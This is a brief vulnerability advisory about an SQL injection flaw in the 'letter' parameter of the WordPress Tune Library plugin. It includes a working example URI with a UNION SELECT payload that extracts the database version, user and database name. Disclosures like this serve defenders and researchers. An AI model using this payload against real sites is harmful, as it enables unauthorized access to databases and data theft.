WordPress Tune Library Plugin 'letter' Parameter SQL Injection Vulnerability

WordPress Tune Library Plugin 'letter' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/wp-content/plugins/tune-library/tune-library-ajax.php?letter=-1' UNION ALL SELECT CONCAT_WS(CHAR(59),version(),current_user(),database()),2--%20